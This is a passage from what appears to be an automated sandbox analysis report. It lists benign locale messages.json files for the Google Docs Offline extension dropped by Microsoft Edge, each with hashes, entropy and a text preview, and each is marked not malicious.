                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
